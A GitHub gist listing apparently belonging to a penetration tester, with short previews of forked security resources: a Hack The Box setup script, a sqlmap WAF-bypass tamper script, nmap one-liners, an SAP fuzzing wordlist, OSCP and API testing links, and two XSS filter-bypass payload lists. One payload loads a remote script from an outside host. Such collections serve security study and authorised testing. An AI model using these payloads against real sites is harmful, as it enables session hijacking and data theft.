search?query=X-Blackboard-product%3A+Blackboard+Learn
| Application | CVE | Infos | Port |
|---|---|---|---|
| APACHE CASSANDRA 3.8 / ZooKEEPER | CVE-2018-8016 | LINK | 7199 |
| NI |
Nasur Ullah Spy0x7
💢
Spy0x7
/ htb-setup.sh
Created
October 4, 2022 19:58
— forked from kavishkagihan/htb-setup.sh
Automated tmux session I use when playing htb boxes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| HTB_DATA_DIR=~/Documents/HTB/ | |
| if [[ $1 ]]; then | |
| a=1 | |
| else | |
| echo "Usage: $0 <Box name>" | |
| exit 1 | |
| fi |
Spy0x7
/ sqlmap_tamper_script_for_bypassing_waf--g4mm4.py
Created
March 20, 2022 19:17
— forked from trietptm/sqlmap_tamper_script_for_bypassing_waf--g4mm4.py
sqlmap tamper script for bypassing WAF--g4mm4 https://pastebin.com/yCAnv7eu
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| sqlmap tamper script for bypassing WAF | |
| g4mm4 is my hero | |
| """ | |
| import re | |
| import random | |
| from lib.core.data import kb | |
| from lib.core.enums import PRIORITY |
Spy0x7
/ xxsfilterbypass.lst
Created
March 8, 2022 09:16
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
Spy0x7
/ Nmap-One-Liners.txt
Created
March 4, 2022 18:03
— forked from sente/Nmap-One-Liners.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Pull Resolved Hosts From .gnmap Files | |
| grep "Host: " *.gnmap|sed 's/\t/ /g'|tr -s '[:space:]'|cut -d" " -f3|awk '!/\(\)/'|sort -u|sed 's/(//g;s/)//g' | |
| # Pull Alive Host IPs Based on Open Port From .gnmap Files | |
| grep "Host:.*Ports:.*/open/" *.gnmap|cut -d" " -f2 | |
| # Pull Alive Host IPs Based on Status Form .gnmap Files (Varying Results Based On Scan Flags [i.e.: -Pn]) | |
| grep "Host:.*Status: Up" *.gnmap|cut -d" " -f2 | |
| # Common Discovery Scan String (Known RTT) |
Spy0x7
/ bashpentesting one-liners and stuff
Created
March 4, 2022 13:01
— forked from sh1nu11bi/bashpentesting one-liners and stuff
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bash,pentesting one-liners and stuff | |
| Basics | |
| grep case insensitive | |
| grep -i "<this>" <file> | |
| grep recursively | |
| grep -ir "<this>" <directory> | |
| grep with word match only (string starting/ending with non-word constituent character) | |
| grep -wi "<this>" <file> | |
| remove/delete filename from grep output | |
| grep -hi "<this>" <file> |
Spy0x7
/ SAPwordlists.txt
Created
March 1, 2022 11:44
— forked from 0x240x23elu/SAPwordlists.txt
SAP Wordlist - SAP fuzz
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /admin/admin.js | |
| /admin/appinfo.jsp | |
| /admin/cache_stats.jsp | |
| /admin/catalogcache.jsp | |
| /admin/ccms/customizing.jsp | |
| /admin/ccms/result.jsp | |
| /admin/ccms/sendFailure.jsp | |
| /ecall/jsp/customer/login/login.jsp | |
| /ecall/jsp/customer/upload/upload.jsp | |
| /user/admin/index.jsp |
Spy0x7
/ OSCP-prep
Created
February 27, 2022 09:24
— forked from cyberheartmi9/OSCP-prep
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #notes | |
| https://www.cnblogs.com/keepmoving1113/tag/OSCP/ | |
| https://hausec.com/pentesting-cheatsheet/ | |
| https://highon.coffee/blog/penetration-testing-tools-cheat-sheet | |
| https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md | |
| https://noobsec.net/oscp-cheatsheet/ | |
| https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html | |
| https://www.reddit.com/r/oscp/comments/824v7z/oscp_exam_taking_fraud/ | |
| https://github.com/OlivierLaflamme/Cheatsheet-God | |
| https://johntuyen.com/personal/2019/05/25/personal-oscpcheatsheet.html |
Spy0x7
/ API pentesting
Created
February 27, 2022 09:22
— forked from cyberheartmi9/API pentesting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/HolyBugx/HolyTips | |
| https://www.apiopscycles.com/api-audit-checklist | |
| https://github.com/inonshk/31-days-of-API-Security-Tips | |
| https://github.com/shieldfy/API-Security-Checklist | |
| https://web.archive.org/web/20210607123429/https://www.binarybrotherhood.io/oauth2_threat_model.html | |
| https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf | |
| https://cheatsheetseries.owasp.org/cheatsheets/Microservices_security.html | |
| https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html | |
| https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf | |
| https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html |
Spy0x7
/ XSS Payloads (WAF Bypass)
Created
February 22, 2022 12:09
— forked from RajChowdhury240/XSS Payloads (WAF Bypass)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |